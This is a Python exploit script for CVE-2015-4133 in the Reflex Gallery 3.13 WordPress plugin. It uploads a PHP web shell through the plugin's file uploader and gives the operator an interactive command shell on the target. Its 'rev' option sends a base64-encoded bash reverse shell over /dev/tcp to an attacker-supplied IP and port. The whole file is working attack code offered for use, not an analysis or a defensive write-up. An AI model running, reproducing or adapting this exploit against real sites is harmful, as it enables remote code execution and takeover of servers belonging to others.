#!/usr/bin/python

# Libraries
import requests
import sys
import argparse
import os
import re
import time
import base64

# Colors
class c:
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'

# Print banner
def banner():

    exp_banner = """  ___      __ _            ___      _ _                ____  _   ____  ___          _     _ _   
 | _ \\___ / _| |_____ __  / __|__ _| | |___ _ _ _  _  |__ / / | |__ / | __|_ ___ __| |___(_) |_ 
 |   / -_)  _| / -_) \\ / | (_ / _` | | / -_) '_| || |  |_ \\_| |_ |_ \\ | _|\\ \\ / '_ \\ / _ \\ |  _|
 |_|_\\___|_| |_\\___/_\\_\\  \\___\\__,_|_|_\\___|_|  \\_, | |___(_)_(_)___/ |___/_\\_\\ .__/_\\___/_|\\__|
                                                |__/                          |_|               """
    print(c.YELLOW + exp_banner + c.END)
    
# Add arguments
def parser():
    p = argparse.ArgumentParser(description="CVE-2015-4133 - Reflex Gallery 3.13 Exploit - Arbitrary File Upload to RCE")
    p.add_argument("-u", "--url", required=False, help="base URL of the wordpress target")
    p.add_argument("-y", "--year", required=False, help="year to look for under wordpress uploads folder")

    return p.parse_args()

# Execute commands once webshell is uploaded
def execute_commands(url, webshell_name, year):

    whoami = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=whoami").text
    whoami = whoami.strip()
    
    hostname = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=hostname -I").text
    hostname = hostname.strip()

    print(c.BLUE + "\nType " + c.YELLOW + "help" + c.BLUE + " to see extra functions\n" + c.END)
    while True:
        
        command_to_exec = input(whoami + "@" + hostname + ":~$ ")
        
        if command_to_exec != "exit" and command_to_exec != "quit" and command_to_exec != "help" and not command_to_exec.startswith("rev ") and command_to_exec != "clear" and command_to_exec != "cls" and command_to_exec != "?":
            command_out = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=" + command_to_exec).text
            print("\n" + command_out)

        if command_to_exec == "help" or command_to_exec == "?":
            print(c.YELLOW + "\nCommands\t\tDescription" + c.END)
            print(c.YELLOW + "--------\t\t-----------" + c.END)
            print(c.BLUE + "rev <ip> <port>\t\tSend a reverse shell to your netcat listener" + c.END)
            print(c.BLUE + "quit/exit\t\tExit from shell" + c.END)
            print(c.BLUE + "clear/cls\t\tClear terminal output" + c.END)
            print(c.BLUE + "help/?\t\t\tPrint this help panel\n" + c.END)

        if command_to_exec == "clear" or command_to_exec == "cls":
            os.system("clear")

        if command_to_exec.startswith("rev "):

            print(c.BLUE + "\n[" + c.YELLOW + "*" + c.BLUE + "] Sending a reverse shell to your listener...\n" + c.END)

            # Parse IP and port
            ip = command_to_exec.split(" ")[1]
            port = command_to_exec.split(" ")[2]
            
            # Define bash reverse shell
            reverse = f"""bash -i &> /dev/tcp/{ip}/{port} 0>&1"""
            reverse = base64.b64encode(reverse.encode()).decode()
            reverse = f"""echo {reverse} | base64 -d | bash"""

            try:
                rev_command = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=" + reverse, timeout=3)
            except:
                pass

        if command_to_exec == "exit" or command_to_exec == "quit":

            print(c.BLUE + "\n[" + c.YELLOW + "*" + c.BLUE + "] Clossing connection, bye!" + c.END)
            sys.exit(0)        

# Main function
def main():

    # Parse arguments
    args = parser()

    try:
        if not sys.argv[1]:
            print("URL not provided, [-h/--help] to show help panel")
            sys.exit(0)
    except:
        print("URL not provided, [-h/--help] to show help panel")
        sys.exit(0)

    banner()
    url = args.url

    # Check if target is live
    time.sleep(0.2)
    print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Checking connection with target..." + c.END)
    checker = requests.get(url, timeout=10)
    time.sleep(0.4)

    if checker.status_code != 404 and checker.status_code != 500:
        print(c.BLUE + "[" + c.YELLOW + "+" + c.BLUE + "] Connection established successfully" + c.END)
    else:
        print(c.BLUE + "[" + c.RED + "-" + c.BLUE + "] Connection refused, exiting" + c.END)
        sys.exit(0)

    try:
        os.remove("exploit-shell.php")
    except:
        pass

    # Create webshell file
    shell = open("exploit-shell.php", "w")
    shell.write("<?php system($_REQUEST['cmd']); ?>")
    shell.close()

    # Define file content
    file = {"qqfile": open("exploit-shell.php", "r")}

    if not url.endswith("/"):
        url = url + "/"

    # Upload file
    time.sleep(0.3)
    print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Uploading malicious file..." + c.END)
    r = requests.post(url + "wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=" + str(year) + "&Month=09", files=file)
    uploaded_name = re.findall(r'"fileName":"(.*?)"', r.text)[0].split("/")[-1]
    time.sleep(0.6)

    if uploaded_name != "" and "true" in r.text:
        print(c.BLUE + "[" + c.YELLOW + "+" + c.BLUE + "] File uploaded successfully" + c.END)
        time.sleep(0.3)

    try:
        os.remove("exploit-shell.php")
    except:
        pass

    # "while" loop to execute commands in a fake-shell
    print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Trying to establish a shell..." + c.END)
    time.sleep(0.4)
    execute_commands(url, uploaded_name, year)

if __name__ == "__main__":

    # Program starts here
    try:
        main()
    except KeyboardInterrupt:
        print(c.BLUE + "\n\nInterrupt handler received, exiting..." + c.END)
        sys.exit(0)